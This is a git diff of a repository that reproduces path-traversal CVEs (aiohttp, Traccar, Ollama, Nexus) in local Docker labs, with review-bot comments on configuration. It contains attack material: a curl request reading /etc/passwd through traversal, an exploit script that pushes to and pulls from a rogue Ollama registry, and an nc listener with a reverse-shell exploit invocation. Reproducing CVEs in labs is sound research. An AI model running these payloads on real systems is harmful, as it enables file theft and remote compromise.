diff --git a/.gitignore b/.gitignore
index d911926..4b2ab36 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,4 +2,9 @@ go1.21.1.linux-amd64.tar.gz
 go.sum
 go.mod
+success.txt
+path_traversal/CVE-2024-48914/package-lock.json
+path_traversal/CVE-2023-1177/.env
+path_traversal/CVE-2024-48914/package.json
+.gitignore
diff --git a/path_traversal/CVE-2024-23334/readme.md b/path_traversal/CVE-2024-23334/readme.md
index 74bafa1..54f1c91 100644
--- a/path_traversal/CVE-2024-23334/readme.md
+++ b/path_traversal/CVE-2024-23334/readme.md
@@ -14,6 +14,6 @@ - Execute : ``` python CVE-2024-23334.py ```
 ### Step 2:
-- Target Server: ``` http://localhost/8081```
+- Target Server: ``` http://localhost:8081```
 - Once aiohttp server is up and running, check on port 8081 of localhost
 - ``` curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd ```
\ No newline at end of file
diff --git a/path_traversal/CVE-2024-24809/exec.sh b/path_traversal/CVE-2024-24809/exec.sh
old mode 100644
new mode 100755
diff --git a/path_traversal/CVE-2024-24809/readme.md b/path_traversal/CVE-2024-24809/readme.md
index 8081a51..ecdb78e 100644
--- a/path_traversal/CVE-2024-24809/readme.md
+++ b/path_traversal/CVE-2024-24809/readme.md
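Review bot: The last added line, `+.gitignore`, has no effect because ignore rules only apply to untracked paths and this file is already tracked (it carries index hashes in this very diff); the entry is misleading noise and should be dropped. Ignoring `path_traversal/CVE-2024-48914/package-lock.json` also means the dependency set used to reproduce that PoC is no longer pinned in the repository, so later checkouts may resolve different package versions; consider keeping the lockfile tracked and ignoring only the installed `node_modules/` directory. Keeping `path_traversal/CVE-2023-1177/.env` out of history is right, but if a copy was committed earlier it stays tracked until removed from the index, which the ignore entry alone does not do.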
@@ -23,10 +23,34 @@ nc -lvnp 4444 ```
 ### Step 3:
-- Target server: ``` http://localhost/8089```
+
+- ```sudo docker ps -a``` and find your container id. ```sudo dokcer inspect ```
+- Getting the bash shel inside the container traccar application: ```sudo docker exec -it de754882c324 sh```
+- Execute the following commands:
+ ```
+ apk add dcron
+apk add openrc
+apk add nano
+apk add inotify-tools
+Update /etc/crontabs/root to have the 1minute job: nano /etc/crontabs/root
+- inside the file add the following at the end:= * * * * * run-parts /etc/periodic/1minute
+mkdir /etc/periodic/1minute
+rc-service /usr/sbin/crond start
+crontab -l
+
+Copy contents from the exec.sh file
+
+
+chmod +x exec.sh
+
+Run this file in the below terminal:
+/opt/traccar # ./exec.sh &
+ ```
+- Check your host port and add it in the ```target_url=``` inside the exec.sh, bash file
+- Target server: ``` http://localhost:8089```
 Execute exploit script
 ```
-go run exploit.go http://localhost:80 LISTENER_IP LISTENER_PORT
-```
\ No newline at end of file
+go run exploit.go http://localhost:80 < LISTENER_IP > < LISTENER_PORT >
+```
diff --git a/path_traversal/CVE-2024-37032/exec.sh b/path_traversal/CVE-2024-37032/exec.sh
index ef1d43b..b86e7cd 100755
--- a/path_traversal/CVE-2024-37032/exec.sh
+++ b/path_traversal/CVE-2024-37032/exec.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-HOST="10.155.102.94"
+HOST="192.168.1.40"
 target_url="http://${HOST}:11434"
 vuln_registry_url="${HOST}/rogue/poc"
@@ -9,4 +9,4 @@ pull_url="${target_url}/api/pull"
 push_url="${target_url}/api/push"
 curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${pull_url}"
-curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}"
\ No newline at end of file
+curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}"
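Review bot: `HOST="192.168.1.40"` on the new side of the first exec.sh hunk is still a hard-coded literal, and the same address is hard-coded a second time in the target_server.py hunk further down this page, so every environment change means editing two files in step, which is exactly what this commit does. Read it from the environment with a fallback instead, `HOST="${HOST:-192.168.1.40}"`, and have target_server.py do the same with `import os` and `HOST = os.environ.get("HOST", "192.168.1.40")`, so one exported variable drives both and the readme step that asks the reader to paste the address into the source can go. The body of exec.sh is only partly visible here; the lines between the two hunks presumably reference HOST unchanged and are unaffected by this change.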
diff --git a/path_traversal/CVE-2024-37032/readme.md b/path_traversal/CVE-2024-37032/readme.md
index e7f41b4..2e40cdd 100644
--- a/path_traversal/CVE-2024-37032/readme.md
+++ b/path_traversal/CVE-2024-37032/readme.md
@@ -21,10 +21,12 @@ Execute the following to install go
 Execute: ``` docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33 ``` and set up the docker container
-## Step 2:
-- Target server: ```http://localhost/80```
+## Step 2:
+- ```hostname -I``` to find your IP. Add this inside target_server.py : ```HOST = ```
+
+- Target server: ```http://localhost/```
 - Rogue Server Setup:
-Execute Target Server: ``` go run rogue_server.go ```
+Execute Target Server: ``` python target_server.py ```
 ## Step 3:
-Exploit Script Execution: ``` go run CVE-2024-23334.go ```
\ No newline at end of file
+Exploit Script Execution: ``` ./exec.sh ```
\ No newline at end of file
diff --git a/path_traversal/CVE-2024-37032/target_server.py b/path_traversal/CVE-2024-37032/target_server.py
index 0cf4979..95836dd 100644
--- a/path_traversal/CVE-2024-37032/target_server.py
+++ b/path_traversal/CVE-2024-37032/target_server.py
@@ -1,6 +1,6 @@
 from fastapi import FastAPI, Request, Response
-HOST = "10.155.102.94"
+HOST = "192.168.1.40"
 app = FastAPI()
 @app.get("/")
diff --git a/path_traversal/CVE-2024-48914/readme.md b/path_traversal/CVE-2024-48914/readme.md
index e4214a1..8997c21 100644
--- a/path_traversal/CVE-2024-48914/readme.md
+++ b/path_traversal/CVE-2024-48914/readme.md
@@ -64,7 +64,7 @@ volumes:
 driver: local
 ```
 - Build the docker and run it:
- ```docker compose up --build```
+ ```sudo docker-compose up```
 ### Step 3:
 - Open a new terminal and run the following commands
diff --git a/path_traversal/CVE-2024-4956/readme.md b/path_traversal/CVE-2024-4956/readme.md
index a62583e..512193f 100644
--- a/path_traversal/CVE-2024-4956/readme.md
+++ b/path_traversal/CVE-2024-4956/readme.md
@@ -1,3 +1,5 @@
+# CVE-2024-4956: Path Traversal Vulnerability in Sonatype Nexus Repository 3
+
 ## Article Source :
 ```
 https://ethicalhacking.uk/cve-2024-4956-path-traversal-vulnerability-in-sonatype-nexus-repository-3/#gsc.tab=0
@@ -15,5 +17,5 @@ docker run -p 8081:8081 --name nexus sonatype/nexus3:3.68.0-java8
 ### Step 3: Create ```exploit.sh bash``` file
 ### Step 4: Execute:
-- Target Server: ``` http://localhost/8081 ```
+- Target Server: ``` http://localhost:8081 ```
 ``` ./exploit.sh ```
\ No newline at end of file